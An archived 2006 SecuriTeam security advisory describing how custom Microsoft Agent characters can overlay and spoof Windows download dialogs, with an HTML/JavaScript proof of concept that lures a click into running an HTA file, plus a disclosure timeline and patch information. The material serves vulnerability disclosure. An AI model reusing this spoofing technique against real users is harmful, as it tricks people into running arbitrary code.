Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] What A Click! (HTA, Microsoft Agent)

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] What A Click! (HTA, Microsoft Agent)
Date: 2 Feb 2006 11:07:57 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  What A Click! (HTA, Microsoft Agent)
------------------------------------------------------------------------


SUMMARY

" <http://www.microsoft.com/msagent/prodinfo/datasheet.asp> Microsoft 
Agent is a technology that provides a foundation for more natural ways for 
people to communicate with their computers." By using custom Microsoft 
Agent characters it is possible to cover any kind of window appearing on 
the user's screen, including security or download dialogs.

DETAILS

Vulnerable Systems:
 * Windows 98
 * Windows 98 SE
 * Windows ME
 * Windows 2000
 * Windows XP
 * Windows 2003 Server

When using custom Microsoft Agent characters it is possible to cover any 
kind of windows, including security or download dialogs. This is an 
expected feature of the Microsoft Agent control. To quote the product 
homepage: " <http://www.microsoft.com/msagent/prodinfo/datasheet.asp> 
Animations are drawn on top of any underlying application window, 
characters are not bounded within their own, separate window". Custom 
characters can be created with tools download able from that homepage.

Because custom characters are fully script-able, can have any kind of 
shape and are downloaded automatically, this can be used as a flexible 
tool to cover and/or spoof any kind of window and lure the user to execute 
arbitrary code by performing one or two clicks (deepening on security zone 
configuration and Windows version).

Proof-of-Concept:
< ! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  >

< html>
< head>
        < title >Fireclicking   Proof-of-Concept< / title>
< / head>
< body onLoad="showGenie();">
< div style="font-family:Verdana;font-size:11px;">

< div 
style="font-family:Verdana;font-size:15px;font-weight:bold;">Fireclicking  
 Proof-of-Concept< / div>
Designed for Internet Explorer 6 on Windows XP SP2 with classic theme
< br>< br>
< div style="width:600px">

< iframe src="about:blank" style="display:none" name="loadframe" 
id="loadframe">< / iframe>

< input type="button" onclick="loadframe.location='hta.hta'" value="click 
here first">

< OBJECT ID="Agent1" ClassID="clsid:D45FD31B-5C6E-11D1-9EC1-00C04FD7081F" 
CodeBase="#VERSION=2,0,0,0">< / OBJECT>

< script language="JavaScript" type="text/javascript">
function showGenie() {
    var spoofWidth   = 500;
    var spoofHeight  = 380;
    var spoofScreenX = (screen.width/2)-(spoofWidth/2);
    var spoofScreenY = (screen.height/2)-(spoofHeight/2)+20;
    var path = 
this.location.href.substr(0,this.location.href.lastIndexOf("/"));
    Agent1.Characters.Load("Character3", path+"/Character4.acf")
    Genie = Agent1.Characters("Character3")
    Genie.MoveTo(spoofScreenX, spoofScreenY)
    Genie.Show()
    Genie.Get("state", "Showing")
    Genie.Get("animation", "anim1")
    Anim = Genie.Play("anim1")
}

< / script>

< br>< br>
< / div>
< / body>
< / html>

The PoC is designed for Internet Explorer 6 on Windows XP SP2 in Windows 
classic theme. By clicking on the button in the upper left corner you 
start the download of a HTA file. The download dialog gets covered by a 
Microsoft Agent character which fakes a button (basically a large white 
image with a button border in the middle). Move the character by dragging 
to see how it uses a "transparent spot" to make room for clicking on the 
underlying dialog through the button space. Transparent areas in 
characters are really "not there", meaning you can click through them.

When you click that button you execute arbitrary code in the HTA file, in 
this case you create the folder "c:\booom!". The button in the upper left 
corner is only need to get around the "drive by download" protection of 
Windows. When this protection is not in place (e.g. on Windows 2000) this 
PoC could be reduced to a single click interaction to execute arbitrary 
code.

Disclosure Timeline:
2004-10-04 Vendor informed
2004-10-06 Vendor opened case, could not reproduce
2004-10-06 Vendor got new testcase
2004-10-12 Vendor confirmed bug
2005-06-14 Vendor released patch and advisory
2006-01-22 Public disclosure


ADDITIONAL INFORMATION

The information has been provided by  <mailto:mikx@mikx.de> mikx.
The vendor advisory can be found at:  
<http://www.securiteam.com/windowsntfocus/5XP0G1FG1A.html> 
http://www.securiteam.com/windowsntfocus/5XP0G1FG1A.html
The original proof of concept can be found at:  
<http://www.mikx.de/fireclicking/> http://www.mikx.de/fireclicking/



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] What A Click! (HTA, Microsoft Agent), SecuriTeam <=
Previous by Date:  [UNIX] PHP Globals Filtering Bypass, SecuriTeam
Next by Date:  [NT] mIRC Font Buffer Overflow (Exploit), SecuriTeam
Previous by Thread:  [UNIX] PHP Globals Filtering Bypass, SecuriTeam
Next by Thread:  [NT] mIRC Font Buffer Overflow (Exploit), SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]